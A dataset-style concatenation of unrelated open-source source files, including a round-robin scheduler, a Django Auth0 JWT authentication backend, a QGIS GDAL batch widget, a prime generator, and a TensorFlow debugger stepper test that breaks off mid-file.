hlines = plt.loglog(dx, rl2_euler, dx, rl2_ns, dx, rl2_euler_limited, dx, rl2_euler_lp_limited, dx_tri, rl2_euler_tri, dx_tri, rl2_euler_tri_limited, dx_pert[0:3], rl2_euler_tri_pert[0:3], dx_fp, rl2_ns_fp)
plt.rc('text', usetex=True)
plt.xlabel("Grid size")
plt.ylabel("$L_2$ error")
plt.legend(hlines, ["euler", "NS manufactured", "euler scalar limited", "euler lp limited", "euler tri", "euler tri limited", "euler tri pert", "NS flat plate"])
plt.grid(True,which="both")
plt.show()
|
Aloomaio/googleads-python-lib
|
examples/ad_manager/v201811/proposal_service/submit_proposals_for_approval.py
|
Python
|
apache-2.0
| 2,333
| 0.00943
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of th
|
e License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the spe
|
cific language governing permissions and
# limitations under the License.
"""This code example approves a single proposal.
To determine which proposals exist, run get_all_proposals.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
PROPOSAL_ID = 'INSERT_PROPOSAL_ID_HERE'
def main(client, proposal_id):
# Initialize appropriate service.
proposal_service = client.GetService('ProposalService', version='v201811')
# Create query.
statement = (ad_manager.StatementBuilder(version='v201811')
.Where('id = :proposalId')
.WithBindVariable('proposalId', proposal_id))
proposals_approved = 0
# Get proposals by statement.
while True:
response = proposal_service.getProposalsByStatement(statement.ToStatement())
if 'results' in response and len(response['results']):
# Display results.
for proposal in response['results']:
print ('Proposal with id "%s", name "%s", and status "%s" will be'
' approved.' % (proposal['id'], proposal['name'],
proposal['status']))
# Perform action.
result = proposal_service.performProposalAction(
{'xsi_type': 'SubmitProposalsForApproval'}, statement.ToStatement())
if result and int(result['numChanges']) > 0:
proposals_approved += int(result['numChanges'])
statement.offset += statement.limit
else:
break
# Display results.
if proposals_approved > 0:
print '\nNumber of proposals approved: %s' % proposals_approved
else:
print '\nNo proposals were approved.'
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, PROPOSAL_ID)
|
openannotation/annotateit
|
console.py
|
Python
|
agpl-3.0
| 306
| 0.009804
|
from IPython import embed
import annotateit
from annotateit import model,
|
db, es
from fl
|
ask import g
def main():
app = annotateit.create_app()
with app.test_request_context():
g.user = model.User.fetch('admin')
embed(display_banner=False)
if __name__ == '__main__':
main()
|
happy5214/competitions-scheduler
|
competitions/scheduler/roundrobin.py
|
Python
|
lgpl-3.0
| 9,367
| 0.000641
|
# -*- coding: utf-8 -*-
"""Round-robin scheduling."""
# Copyright (C) 2015 Alexander Jones
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of
|
the License, or
# (at your option) any later version.
#
# This pro
|
gram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, unicode_literals
import copy
import random
from . import NoMatchFound, ScheduleGenerationFailed
from .scheduler import Scheduler
class RoundRobinScheduler(Scheduler):
"""A standard round-robin scheduler."""
def __init__(self, teams, meetings=0):
"""Constructor.
@param teams: A list of teams or the number of teams
@type teams: list or int
@param meetings: The number of times teams meet each other
@type meetings: int
"""
if not isinstance(teams, list):
teams = list(range(1, teams + 1))
if len(teams) % 2 == 1:
teams.append(None)
self.teams = teams
self.meetings = meetings
@property
def match_count(self):
"""The number of matches per round."""
return int(len(self.teams) / 2)
@property
def round_count(self):
"""The number of rounds in a season."""
return int((len(self.teams) - 1) * self.meetings)
@property
def home_teams(self):
"""The "home" teams from the previous schedule generation."""
if hasattr(self, '_home_teams'):
return tuple(self._home_teams)
else:
return ()
def _generate_home_teams(self, home_teams=None):
"""Generate the list of home teams for a matrix."""
team_count = len(self.teams) # Number of teams
odd_team_count = None in self.teams # Whether there is a blank placeholder
if not home_teams: # Randomly select home teams
if odd_team_count:
home_count = (team_count - 1) // 2
homes = random.sample(range(team_count - 1), home_count)
homes.append(team_count - 1) # Spacer is always home
else:
home_count = team_count // 2
homes = random.sample(range(team_count), home_count)
self._home_teams = [self.teams[i] for i in homes]
else: # if home_teams. Use provided teams.
self._home_teams = home_teams
homes = [self.teams.index(home) for home in home_teams]
return homes
def generate_matrix(self, home_teams=None):
"""Generate a schedule matrix for odd meeting counts."""
team_count = len(self.teams) # Number of teams
home_at_home = team_count // 2 # "Home" teams have ceiling(half) of their matches at home
away_at_home = (team_count - 1) // 2 # "Away" teams have floor(half) at home
odd_team_count = None in self.teams # Whether there is a blank placeholder
homes = self._generate_home_teams(home_teams)
matrix = [[None] * team_count for __ in range(team_count)]
for i in range(team_count - 1):
home_team = i in homes # Whether the team is a home team
home_count = (away_at_home
if not home_team or odd_team_count else home_at_home)
home_count -= matrix[i].count(True) # Check previously assigned match pairings
try:
if odd_team_count:
home_opps = random.sample(list(range(i + 1, team_count - 1)),
home_count)
if home_team:
home_opps.append(team_count - 1)
else:
home_opps = random.sample(list(range(i + 1, team_count)),
home_count)
for opp in range(i + 1, team_count):
is_home = opp in home_opps
matrix[i][opp] = is_home
matrix[opp][i] = not is_home
except ValueError: # Recurse
return self.generate_matrix(home_teams=home_teams)
return matrix
def _generate_even_matches(self, evens):
"""Generate a list of matches for even meeting counts."""
return [(team, opp)
for team in self.teams
for opp in self.teams
if team != opp] * evens
def _generate_odd_matches(self, home_teams=None):
"""Generate a list of matches for odd meeting counts."""
matrix = self.generate_matrix(home_teams=home_teams)
matches = []
for team_idx in range(len(self.teams)):
for opp_idx in range(team_idx + 1, len(self.teams)):
if matrix[team_idx][opp_idx]:
matches.append((self.teams[team_idx],
self.teams[opp_idx]))
else:
matches.append((self.teams[opp_idx],
self.teams[team_idx]))
return matches
def generate_matches(self, home_teams=None):
"""Generate the matches for the season.
@return: The matches to schedule
@rtype: list
"""
is_odd = self.meetings % 2 == 1
evens = self.meetings // 2
matches = self._generate_even_matches(evens) if evens > 0 else []
if is_odd:
matches.extend(self._generate_odd_matches(home_teams))
return matches
def generate_round(self, matches):
"""Generate a round.
@param matches: The generated matches
@type matches: list
@return: The generated round
@rtype: list
"""
round = []
try:
random.shuffle(matches)
round.append(matches.pop(0))
poss = copy.copy(matches)
for __ in range(1, self.match_count):
match = Scheduler.find_unique_match(round, poss)
round.append(match)
matches.remove(match)
return round
except NoMatchFound:
matches.extend(round)
return None
def _generate_schedule_round(self, matches):
"""Fully generate a round for a schedule."""
for ___ in range(10):
next_round = self.generate_round(matches)
if next_round:
return next_round
else:
raise ScheduleGenerationFailed('Schedule generation failed.')
def generate_schedule(self, try_once=False, home_teams=None):
"""Generate the schedule.
@param try_once: Whether to only try once to generate a schedule
@type try_once: bool
@return: The generated schedule
@rtype: list of lists of tuples
@raise RuntimeError: Failed to create schedule within limits
"""
rounds = []
matches = self.generate_matches(home_teams=home_teams)
try:
for __ in range(self.round_count):
rounds.append(self._generate_schedule_round(matches))
except ScheduleGenerationFailed as ex:
if try_once:
raise ex
else:
return self.generate_schedule(try_once, home_teams)
return rounds
# Aliases for common meeting counts
class SingleRoundRobinScheduler(RoundRobinScheduler):
"""A standard single round-robin scheduler.
This is an alias of RoundRobinScheduler, with meetings=1.
"""
def __init__(self, teams):
"""Constructor.
@param teams: A list of teams or the number of teams
@type teams: list or int
"""
super(SingleRoundRobinScheduler, self).__init__(teams, meetings=1)
class DoubleRoundRobinScheduler(RoundRobinScheduler):
"""
|
ChrisLR/Python-Roguelike-Template
|
bodies/blood/base.py
|
Python
|
mit
| 178
| 0.005618
|
class Blood(object):
uid = "blood"
name = "Blood"
"""
Most characters will have ordinary bloo
|
d but some could have acidic blood or with other
|
properties.
"""
|
mcueto/djangorestframework-auth0
|
rest_framework_auth0/authentication.py
|
Python
|
mit
| 6,383
| 0.000783
|
import logging
from django.contrib.auth.backends import (
RemoteUserBackend,
get_user_model,
)
from django.contrib.auth.models import (
Group,
)
from django.utils.translation import ugettext as _
from rest_framework import exceptions
from rest_framework_auth0.settings import (
auth0_api_settings,
)
from rest_framework_auth0.utils import (
get_auth_token,
get_client_setting,
get_groups_from_payload,
decode_auth_token,
)
from rest_framework.authentication import (
BaseAuthentication,
)
get_username_from_payload = auth0_api_settings.GET_USERNAME_HANDLER
logger = logging.getLogger(__name__)
class Auth0JSONWebTokenAuthentication(BaseAuthentication, RemoteUserBackend):
"""
Clients should authenticate by passing the token key in the "Authorization"
HTTP header, prepended with the string specified in the setting
`AUTH_HEADER_PREFIX`. For example:
Authorization: JWT eyJhbGciOiAiSFMyNTYiLCAidHlwIj
By default, the ``authenticate_credentials`` method creates ``User`` objects for
usernames that don't already exist in the database. Subclasses can disable
this behavior by setting the ``create_unknown_user`` attribute to
``False``.
"""
www_authenticate_realm = 'api'
# Create a User object if not already in the database?
create_unknown_user = True
def authenticate(self, request):
"""
You should pass a header of your request: clientcode: web
This function initialize the settings of JWT with the specific client's informations.
"""
client = None
payload = None
logger.debug("authenticating user using Auth0JSONWebTokenAuthentication")
client = get_client_setting(request)
auth_token = get_auth_token(request)
if auth_token is None:
return None
payload = decode_auth_token(
client=client,
auth_token=auth_token
)
# Add request param to authenticated_credentials() call
user = self.authenticate_credentials(request, payload)
return (user, payload)
def authenticate_credentials(self, request, payload):
"""
Returns an active user that matches the payload's user id and email.
"""
UserModel = get_user_model()
remote_user = get_username_from_payload(payload)
if not remote_user:
msg = _('Invalid payload.')
logger.info(
"{message}".format(
message=msg
)
)
raise exceptions.AuthenticationFailed(msg)
# RemoteUserBackend behavior:
# return
user = None
if auth0_api_settings.REPLACE_PIPE_FOR_DOTS_IN_USERNAME:
username = self.clean_username(remote_user)
else:
username = remote_user
logger.debug(
"username = {username}".format(
username=username
)
)
if self.create_unknown_user:
user, created = UserModel._default_manager.get_or_create(**{
UserModel.USERNAME_FIELD: username
})
if created:
user = self.configure_user(request, user)
else:
try:
user = UserModel._default_manager.get_by_natural_key(username)
except UserModel.DoesNotExist:
msg = _('Invalid signature.')
raise exceptions.AuthenticationFailed(msg)
# RemoteUserBackend behavior:
# pass
user = self.configure_user_permissions(user, payload)
return user if self.user_can_authenticate(user) else None
def authenticate_header(self, request):
"""
Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(
auth0_api_settings.AUTH_HEADER_PREFIX,
self.www_authenticate_realm
)
def configure_user_permissions(self, user, payload):
"""
Validate if AUTHORIZATION
|
_EXTENSION is enabled, defaults to False
If AUTHORIZATION_EXTENSION is enabled, created and associated groups
with th
|
e current user (the user of the token).
"""
if auth0_api_settings.AUTHORIZATION_EXTENSION:
logger.debug(
"Using Auth0 Authorization Extension"
)
logger.debug(
"Clearing groups for user: {username}".format(
username=user.username
)
)
user.groups.clear()
try:
logger.debug(
"Getting groups from payload"
)
groups = get_groups_from_payload(payload)
logger.debug(
"Groups: {groups}".format(
groups=groups
)
)
except Exception: # No groups where defined in Auth0?
logger.warning(
"No groups were defined for user: {username}".format(
username=user.username
)
)
return user
for user_group in groups:
group, created = Group.objects.get_or_create(name=user_group)
logger.debug(
"Associating group {group} with user {username}".format(
group=group,
username=user.username
)
)
user.groups.add(group)
return user
def clean_username(self, username):
"""
Cleans the "username" prior to using it to get or create the user object.
Returns the cleaned username.
Auth0 default username (user_id) field returns, e.g. auth0|123456789...xyz
which contains illegal characters ('|').
"""
logger.debug("Cleaning username")
username = username.replace('|', '.')
logger.debug(
"Clean username: {username}".format(
username=username
)
)
return username
|
rubennj/pvlib-python
|
pvlib/test/test_atmosphere.py
|
Python
|
bsd-3-clause
| 1,611
| 0.017381
|
import logging
pvl_logger = logging.getLogger('pvlib')
import datetime
import numpy as np
import pandas as pd
from nose.tools import raises
from nose.tools import assert_almost_equals
from pvlib.location import Location
from pvlib import solarposition
from pvlib import atmosphere
# setup times and location to be tested.
times = pd.date_range(start=datetime.datetime(2014,6,24),
|
end=datetime.datetime(2014,6,26), freq='1Min')
tus = Location(32.2, -111, 'US/Arizona', 700)
times_localized = times.tz_localize(tus.tz)
ephem_data = solarposition.get_solarposition(times, tus)
# need to add physical tests instead of just functional tests
def test_pres2alt():
atmosphere.pres2alt(100000)
def test_alt2press():
atmosphere.pres2alt(1000)
# two functions combined will gener
|
ate unique unit tests for each model
def test_airmasses():
models = ['simple', 'kasten1966', 'youngirvine1967', 'kastenyoung1989',
'gueymard1993', 'young1994', 'pickering2002', 'invalid']
for model in models:
yield run_airmass, ephem_data['zenith'], model
def run_airmass(zenith, model):
atmosphere.relativeairmass(zenith, model)
def test_absoluteairmass():
relative_am = atmosphere.relativeairmass(ephem_data['zenith'], 'simple')
atmosphere.absoluteairmass(relative_am)
atmosphere.absoluteairmass(relative_am, pressure=100000)
def test_absoluteairmass_numeric():
atmosphere.absoluteairmass(2)
def test_absoluteairmass_nan():
np.testing.assert_equal(np.nan, atmosphere.absoluteairmass(np.nan))
|
deniscostadsc/regex-tutorial
|
17-exercises/01-ponto/regex.py
|
Python
|
mit
| 282
| 0
|
'''
Nesse exer você deve casar linha que tem 'tio', mas que tenham 1 caractere
antes
|
.
Para fixação, usar o '.' (ponto).
'''
import re
import sys
REGEX = r''
lines = sy
|
s.stdin.readlines()
for line in lines:
if re.search(REGEX, line):
print(line.replace('\n', ''))
|
natabbotts/math-prog-club
|
prime.py
|
Python
|
mit
| 1,686
| 0.007711
|
import heapq, itertools
def factorisation(number):
"""Returns a list of the prime factors of a number in ascending order."""
factors = []
while number > 1:
for factor in range(2, number + 1):
if number % factor == 0:
factors.append(factor)
# floor division needed to return an int
# required because range() needs integer values
number //= factor
break
return factors
def primes(limit = None):
""" Generator yielding primes below (optional) limit."""
if limit is None:
return _infinite_primes()
else:
return itertools.takewhile(lambda x: x < limit, _infinite_primes())
def _infinite_primes():
"""A generator for infinite primes."""
# priority queue of the sequences of non-primes
# the priority queue allows us to get the "next" non-prime quickly
nonprimes = []
i = 2
while True:
if nonprimes and i == nonprimes[0][0]: # non-prime
while nonprimes[0][0] == i:
# for each sequence that generates this number,
# have it go to the next number (simply add the prime)
# and re-position it in the priority queue
x = nonprimes[0
|
]
x[0] += x[1]
heapq.heapreplace(nonprimes, x)
else: # prime
# insert a 2-element list into the priority queue:
# [current multiple, prime]
# the first element allows sorting by value of current multiple
# we
|
start with i^2
heapq.heappush(nonprimes, [i*i, i])
yield i
i += 1
|
oktayuyar/Velespi
|
profiles/urls.py
|
Python
|
gpl-3.0
| 328
| 0.006098
|
from django.conf.urls import url
from profiles import views
urlpatterns = [
url(r"users$", views.UserList.as_view(),
name="api-user-list"),
url(r"user/(?P<pk>[0-9]+)$", views.UserSingle.as_view(
|
),
|
name="api-review-list"),
url(r"userlogin$", views.UserLogin.as_view(),
name="api-login"),
]
|
camptocamp/QGIS
|
python/plugins/GdalTools/tools/widgetBatchBase.py
|
Python
|
gpl-2.0
| 5,310
| 0.030697
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
widgetBatchBase.py
---------------------
Date : June 2010
Copyright : (C) 2010 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giuseppe Sucameli'
__date__ = 'June 2010'
__copyright__ = '(C) 2010, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
from widgetPluginBase import GdalToolsBasePluginWidget as BasePluginWidget
import GdalTools_utils as Utils
class GdalToolsBaseBatchWidget(BasePluginWidget):
def __init__(self, iface, commandName):
BasePluginWidget.__init__(self, iface, commandName)
def getBatchArguments(self, inFile, outFile = None):
arguments = []
arguments.extend( self.getArguments() )
arguments.append( inFile )
if outFile != None:
arguments.append(outFile)
return arguments
def isBatchEnabled(self):
return False
def isRecursiveScanEnabled(self):
return False
def setProgressRange(self, maximum):
pass
def updateProgress(self, value, maximum):
pass
def getBatchOutputFileName(self, fn):
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
# if overwrites existent files
if outDir == None or outDir == inDir:
return fn + ".tmp"
return outDir + fn[len(inDir):]
def onRun( self ):
if not self.isBatchEnabled():
BasePluginWidget.onRun(self)
return
self.batchRun()
def batchRun(self):
self.base.enableRun( False )
self.base.setCursor( Qt.WaitCursor )
inDir = self.getInputFileName()
self.inFiles = Utils.getRasterFiles( inDir, self.isRecursiveScanEnabled() )
self.outFiles = []
for f in self.inFiles:
self.outFiles.append( self.getBatchOutputFileName( f ) )
self.errors = []
self.batchIndex = 0
self.batchTotal = len( self.inFiles )
self.setProgressRange( self.batchTotal )
self.runItem( self.batchIndex, self.batchTotal )
def runItem(self, index, total):
self.updateProgress(index, total)
if index >= total:
self.batchFinished()
return
outFile = None
if len(self.outFiles) > index:
outFile = self.outFiles[ index ]
args = self.getBatchArguments( self.inFiles[index], outFile )
self.base.refreshArgs(args)
BasePluginWidget.onRun(self)
def onFinished(self, exitCode, status):
if not self.isBatchEnabled():
BasePluginWidget.onFinished(self, exitCode, status)
return
msg = bytes.decode( bytes( self.base.process.readAllStandardError() ) )
if msg != '':
self.errors.append( ">> " + self.inFiles[self.batchIndex] + "<br>" + msg.replace( "\n", "<br>" ) )
self.base.process.close()
# overwrite existent files
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
if outDir == None or inDir == outDir:
oldFile = QFile( self.inFiles[self.batchIndex] )
newFile = QFile( self.outFiles[self.batchIndex] )
if oldFile.remove():
newFile.rename(self.inFiles[self.batchIndex])
self.batchIndex += 1
self.runItem( self
|
.batchIndex, self.batchTotal )
def batchFinished( self ):
self.base.stop()
if len(self.errors) > 0:
msg = u"Processing of the following files ended with error: <br><br>" + "<br><br>".join( self.errors )
QErrorMessag
|
e( self ).showMessage( msg )
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
if outDir == None or inDir == outDir:
self.outFiles = self.inFiles
# load layers managing the render flag to avoid waste of time
canvas = self.iface.mapCanvas()
previousRenderFlag = canvas.renderFlag()
canvas.setRenderFlag( False )
notCreatedList = []
for item in self.outFiles:
fileInfo = QFileInfo( item )
if fileInfo.exists():
if self.base.loadCheckBox.isChecked():
self.addLayerIntoCanvas( fileInfo )
else:
notCreatedList.append( item )
canvas.setRenderFlag( previousRenderFlag )
if len( notCreatedList ) == 0:
QMessageBox.information( self, self.tr( "Finished" ), self.tr( "Operation completed." ) )
else:
QMessageBox.warning( self, self.tr( "Warning" ), self.tr( "The following files were not created: \n{0}" ).format( ', '.join( notCreatedList ) ) )
|
steven-cutting/latinpigsay
|
test.py
|
Python
|
mit
| 636
| 0
|
# -*- coding: utf-8 -*-
__title__ = 'latinpig
|
say'
__license__ = 'MIT'
__author__ = 'Steven Cutting'
__author_email__ = 'steven.c.projects@gmail.com'
__created_on__ = '12/7/2014'
if __name__ == "__main__":
from tests import testscript as ts
from tests import contstests
from latinpigsay.tmp.experiments import exp
from data.text import samples as sam
from latinpigsay import latinpig as lp
from latinpigsay import piggyprint as pp
import sys
import logging
lo
|
gging.basicConfig(filename='tests.log')
testtorun = sys.argv[1]
if testtorun == 'contspara':
contstests.contsparatest()
|
quantumlib/OpenFermion-FQE
|
src/fqe/fqe_ops/fqe_ops_utils.py
|
Python
|
apache-2.0
| 2,752
| 0
|
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for FQE operators."""
import re
def validate_rdm_string(ops: str) -> str:
"""Check that a string for rdms are valid.
Args:
ops (str): St
|
ring expression to be computed.
Returns
(str): Either 'element' or 'tensor'.
"""
qftops = ops.split()
nops = len(qftops)
assert (nops
|
% 2) == 0
if any(char.isdigit() for char in ops):
creation = re.compile(r"^[0-9]+\^$")
annihilation = re.compile(r"^[0-9]+$")
ncre = 0
nani = 0
for opr in qftops:
if creation.match(opr):
ncre += 1
elif annihilation.match(opr):
nani += 1
else:
raise TypeError("Unsupported behavior for {}".format(ops))
assert nani == ncre
return "element"
creation = re.compile(r"^[a-z]\^$")
annihilation = re.compile(r"^[a-z]$")
ncre = 0
nani = 0
for opr in qftops:
if creation.match(opr):
ncre += 1
elif annihilation.match(opr):
nani += 1
else:
raise TypeError("Unsupported behvior for {}.".format(ops))
if nani != ncre:
raise ValueError("Unequal creation and annihilation operators.")
return "tensor"
def switch_broken_symmetry(string: str) -> str:
"""Convert the string passed in to the desired symmetry.
Args:
string (str): Input string in the original expression.
Returns:
(str): Output string in the converted format.
"""
new = ""
if any(char.isdigit() for char in string):
work = string.split()
creation = re.compile(r"^[0-9]+\^$")
annihilation = re.compile(r"^[0-9]+$")
for opr in work:
if creation.match(opr):
if int(opr[:-1]) % 2:
val = opr[:-1]
else:
val = opr
elif annihilation.match(opr):
if int(opr) % 2:
val = opr + "^"
else:
val = opr
new += val + " "
else:
new = string
return new.rstrip()
|
maartenq/pcrunner
|
tests/test_configuration.py
|
Python
|
isc
| 1,602
| 0
|
# tests/test_configuration.py
# vim: ai et ts=4 sw=4 sts=4 ft=python fileencoding=utf-8
from io import StringIO
from pcrunner.configuration import (
read_check_commands,
read_check_commands_txt,
read_check_commands_yaml,
)
def test_read_check_commmands_txt_with_extra_lines():
fd = StringIO(
u'''SERVICE|CHECK_01|check_dummy.py|0 OK -s 0
SERVICE|CHECK_02|check_dummy.py|1 WARNING -s 10
'''
)
assert read_check_commands_txt(fd) == [
{
'command': u'check_dummy.py 0 OK -s 0',
|
'name': u'CHEC
|
K_01',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
{
'command': u'check_dummy.py 1 WARNING -s 10',
'name': u'CHECK_02',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
]
def test_read_check_commmands_yaml():
fd = StringIO(
u'''
- name: 'CHECK_01'
command: 'check_dummy.py 0 OK -s 0'
result_type: 'PROCESS_SERVICE_CHECK_RESULT'
- name: 'CHECK_02'
command: 'check_dummy.py 1 WARNING -s 10'
result_type: 'PROCESS_SERVICE_CHECK_RESULT'
'''
)
assert read_check_commands_yaml(fd) == [
{
'command': u'check_dummy.py 0 OK -s 0',
'name': u'CHECK_01',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
{
'command': u'check_dummy.py 1 WARNING -s 10',
'name': u'CHECK_02',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
]
def test_read_check_commands_returns_empyt_list():
assert read_check_commands('/does/not/exists') == []
|
wangyum/tensorflow
|
tensorflow/python/debug/lib/stepper_test.py
|
Python
|
apache-2.0
| 45,190
| 0.012304
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests of the tfdbg Stepper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.debug.lib.stepper import NodeStepper
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
class StepperTest(test_util.TensorFlowTestCase):
def setUp(self):
self.a = variables.Variable(2.0, name="a")
self.b = variables.Variable(3.0, name="b")
self.c = math_ops.multiply(self.a, self.b, name="c") # Should be 6.0.
self.d = math_ops.multiply(self.a, self.a, name="d") # Should be 4.0.
self.e = math_ops.multiply(self.d, self.c, name="e") # Should be 24.0.
self.f_y = constant_op.constant(0.30, name="f_y")
self.f = math_ops.div(self.b, self.f_y, name="f") # Should be 10.0.
# The there nodes x, y and z form a graph with "cross-links" in. I.e., x
# and y are both direct inputs to z, but x is also a direct input to y.
self.x = variables.Variable(2.0, name="x") # Should be 2.0
self.y = math_ops.negative(self.x, name="y") # Should be -2.0.
self.z = math_ops.multiply(self.x, self.y, name="z") # Should be -4.0.
self.sess = session.Session()
|
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
def testContToFetchNotInTr
|
ansitiveClosureShouldError(self):
with NodeStepper(self.sess, "e:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(7, len(sorted_nodes))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertSetEqual(
{"e:0", "d:0", "c:0", "a/read:0", "b/read:0", "b:0", "a:0"},
set(stepper.closure_elements()))
with self.assertRaisesRegexp(
ValueError,
"Target \"f:0\" is not in the transitive closure for the fetch of "
"the stepper"):
stepper.cont("f:0")
def testContToNodeNameShouldReturnTensorValue(self):
with NodeStepper(self.sess, "e:0") as stepper:
self.assertAllClose(6.0, stepper.cont("c"))
def testUsingNamesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, "e:0") as stepper:
# The first cont() call should have used no feeds.
result = stepper.cont("c:0")
self.assertAllClose(6.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertEqual({}, stepper.last_feed_types())
# The second cont() call should have used the tensor handle from the
# previous cont() call.
result = stepper.cont("e:0")
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(4.0, stepper.get_tensor_value("d:0"))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testUsingNodesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, self.e) as stepper:
# There should be no handles before any cont() calls.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# Before the cont() call, the stepper should not have access to the value
# of c:0.
with self.assertRaisesRegexp(
ValueError,
"This stepper instance does not have access to the value of tensor "
"\"c:0\""):
stepper.get_tensor_value("c:0")
# Using the node/tensor itself, instead of the name str, should work on
# cont().
result = stepper.cont(self.c)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertEqual({"c"}, stepper.handle_node_names())
# After the cont() call, the stepper should have access to the value of
# c:0 via a tensor handle.
self.assertAllClose(6.0, stepper.get_tensor_value("c:0"))
result = stepper.cont(self.e)
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testContToTensorWithIntermediateDumpShouldUseDump(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(2.0, stepper.cont("a/read:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertAllClose(10.0, stepper.cont("f:0"))
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
def testDisablingUseDumpedIntermediatesWorks(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
